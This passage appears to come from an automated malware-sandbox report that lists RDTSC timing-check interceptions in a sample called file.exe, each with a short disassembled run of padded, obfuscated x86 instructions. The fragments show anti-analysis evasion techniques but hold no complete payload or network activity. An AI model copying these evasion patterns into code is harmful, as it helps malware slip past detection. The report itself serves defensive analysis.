                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0EAD2 second address: B0EB0D instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF154CE3616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007FF154CE3616h 0x00000011 jmp 00007FF154CE3622h 0x00000016 je 00007FF154CE3616h 0x0000001c popad 0x0000001d pop esi 0x0000001e pushad 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 jl 00007FF154CE3616h 0x00000028 popad 0x00000029 pushad 0x0000002a push eax 0x0000002b pop eax 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B106C9 second address: B106F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007FF154EB2276h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B106F1 second address: B106F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B106F6 second address: B106FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B106FB second address: B1071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnp 00007FF154CE361Ah 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007FF154CE3616h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1071B second address: B1071F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B108AF second address: B108B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B108B4 second address: B10908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007FF154EB2268h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 cld 0x00000027 push 00000000h 0x00000029 jne 00007FF154EB2272h 0x0000002f push D1B9238Ch 0x00000034 pushad 0x00000035 jno 00007FF154EB2268h 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B109E6 second address: B109EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B109EA second address: B109FE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FF154EB2266h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B109FE second address: B10A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10A02 second address: B10A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10AFD second address: B10B1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF154CE3629h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10BE5 second address: B10C39 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF154EB2268h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 3AEAE754h 0x00000013 pushad 0x00000014 sub bl, FFFFFFD4h 0x00000017 popad 0x00000018 mov dx, 798Bh 0x0000001c lea ebx, dword ptr [ebp+1245254Ch] 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007FF154EB2268h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c mov edi, eax 0x0000003e sbb si, FE3Fh 0x00000043 xchg eax, ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushad 0x00000048 popad 0x00000049 js 00007FF154EB2266h 0x0000004f popad 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10C39 second address: B10C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF154CE3627h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F6DB second address: B2F6F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB226Dh 0x00000007 jg 00007FF154EB2266h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F6F8 second address: B2F715 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE3629h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F715 second address: B2F71F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F71F second address: B2F725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2F725 second address: B2F729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FA11 second address: B2FA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FF154CE3616h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007FF154CE3629h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FA38 second address: B2FA40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FA40 second address: B2FA45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FA45 second address: B2FA4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FA4D second address: B2FA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FCCC second address: B2FCD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FF154EB2266h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FCD6 second address: B2FCDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2FCDA second address: B2FCF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jmp 00007FF154EB2270h 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3011F second address: B3013F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE361Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FF154CE3616h 0x00000011 ja 00007FF154CE3616h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3013F second address: B3014F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF154EB2266h 0x00000008 jno 00007FF154EB2266h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3014F second address: B30154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B302D9 second address: B302E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007FF154EB2266h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30467 second address: B30476 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE361Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30476 second address: B3048A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FF154EB2272h 0x0000000c jc 00007FF154EB226Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF19E1 second address: AF19EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30BF4 second address: B30BF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30BF9 second address: B30C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30C0C second address: B30C12 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30D85 second address: B30D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF154CE3616h 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30D90 second address: B30D97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30D97 second address: B30DB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FF154CE3629h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30F32 second address: B30F36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B30F36 second address: B30F3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B36198 second address: B3619E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF859A second address: AF85D3 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF154CE3616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FF154CE3633h 0x00000010 pop ebx 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jno 00007FF154CE3616h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AF85D3 second address: AF85D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37760 second address: B37765 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3ED14 second address: B3ED18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41539 second address: B41548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pop ebx 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41548 second address: B41568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154EB2273h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FF154EB2266h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41568 second address: B4156C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41B7A second address: B41B8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB226Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41E5E second address: B41E83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE3625h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jng 00007FF154CE3616h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41E83 second address: B41E88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41F31 second address: B41F48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154CE3623h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B41F48 second address: B41F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF154EB226Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4201F second address: B42043 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF154CE3625h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jng 00007FF154CE3637h 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B425CE second address: B425D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF154EB2266h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B425D9 second address: B425DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B425DF second address: B425F5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF154EB2266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007FF154EB226Eh 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AFA29F second address: AFA2A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B488E5 second address: B488F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB226Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B488F4 second address: B488F9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4CAF3 second address: B4CAF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4CAF7 second address: B4CAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4CAFD second address: B4CB03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4CB03 second address: B4CB07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E0A1 second address: B4E0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FF154EB2266h 0x0000000a jmp 00007FF154EB226Ch 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E801 second address: B4E807 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E9CC second address: B4EA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FF154EB2268h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000015h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov bx, A9C1h 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov ebx, dword ptr [ebp+122D3748h] 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov bl, ah 0x0000003b mov eax, dword ptr [ebp+122D009Dh] 0x00000041 push 00000000h 0x00000043 push edx 0x00000044 call 00007FF154EB2268h 0x00000049 pop edx 0x0000004a mov dword ptr [esp+04h], edx 0x0000004e add dword ptr [esp+04h], 0000001Dh 0x00000056 inc edx 0x00000057 push edx 0x00000058 ret 0x00000059 pop edx 0x0000005a ret 0x0000005b mov edi, 46D14430h 0x00000060 or edi, dword ptr [ebp+122D2A4Ah] 0x00000066 push FFFFFFFFh 0x00000068 add dword ptr [ebp+1245FC73h], edi 0x0000006e push eax 0x0000006f pushad 0x00000070 jmp 00007FF154EB2271h 0x00000075 push eax 0x00000076 push edx 0x00000077 push ebx 0x00000078 pop ebx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51ABB second address: B51AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B51AC1 second address: B51AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52A78 second address: B52A7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B53794 second address: B537B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2272h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FF154EB2266h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52A7C second address: B52A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B537B2 second address: B53845 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF154EB2266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FF154EB2275h 0x00000012 jmp 00007FF154EB226Eh 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FF154EB2268h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 00000016h 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 mov ebx, edi 0x00000035 push 00000000h 0x00000037 pushad 0x00000038 mov dx, di 0x0000003b mov dword ptr [ebp+12475EAEh], eax 0x00000041 popad 0x00000042 sub dword ptr [ebp+1244CDBAh], ecx 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push ebx 0x0000004d call 00007FF154EB2268h 0x00000052 pop ebx 0x00000053 mov dword ptr [esp+04h], ebx 0x00000057 add dword ptr [esp+04h], 0000001Ah 0x0000005f inc ebx 0x00000060 push ebx 0x00000061 ret 0x00000062 pop ebx 0x00000063 ret 0x00000064 or di, 26B3h 0x00000069 push eax 0x0000006a push ebx 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B52A82 second address: B52B11 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007FF154CE3616h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 pop edx 0x00000015 nop 0x00000016 mov bx, BF45h 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov dword ptr [ebp+122D1876h], ebx 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push edi 0x00000031 call 00007FF154CE3618h 0x00000036 pop edi 0x00000037 mov dword ptr [esp+04h], edi 0x0000003b add dword ptr [esp+04h], 00000019h 0x00000043 inc edi 0x00000044 push edi 0x00000045 ret 0x00000046 pop edi 0x00000047 ret 0x00000048 jnl 00007FF154CE3628h 0x0000004e mov eax, dword ptr [ebp+122D09B5h] 0x00000054 or dword ptr [ebp+1248882Ch], ebx 0x0000005a push FFFFFFFFh 0x0000005c mov dword ptr [ebp+1244EA9Ah], ebx 0x00000062 nop 0x00000063 jns 00007FF154CE361Eh 0x00000069 jnl 00007FF154CE3618h 0x0000006f push edx 0x00000070 pop edx 0x00000071 push eax 0x00000072 push ecx 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54768 second address: B5476C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B55628 second address: B5563E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnl 00007FF154CE3616h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54908 second address: B5490C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5563E second address: B5568C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF154CE3616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c sbb bx, 4AE6h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FF154CE3618h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov ebx, dword ptr [ebp+122D2058h] 0x00000033 mov dword ptr [ebp+122D1B7Dh], esi 0x00000039 push 00000000h 0x0000003b clc 0x0000003c xchg eax, esi 0x0000003d push eax 0x0000003e push edx 0x0000003f push esi 0x00000040 push esi 0x00000041 pop esi 0x00000042 pop esi 0x00000043 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5568C second address: B556AB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF154EB226Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jbe 00007FF154EB228Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 jng 00007FF154EB2266h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B56766 second address: B567F1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF154CE3616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007FF154CE361Ch 0x00000010 js 00007FF154CE3616h 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007FF154CE3625h 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FF154CE3618h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 jmp 00007FF154CE361Fh 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push edx 0x00000042 call 00007FF154CE3618h 0x00000047 pop edx 0x00000048 mov dword ptr [esp+04h], edx 0x0000004c add dword ptr [esp+04h], 00000018h 0x00000054 inc edx 0x00000055 push edx 0x00000056 ret 0x00000057 pop edx 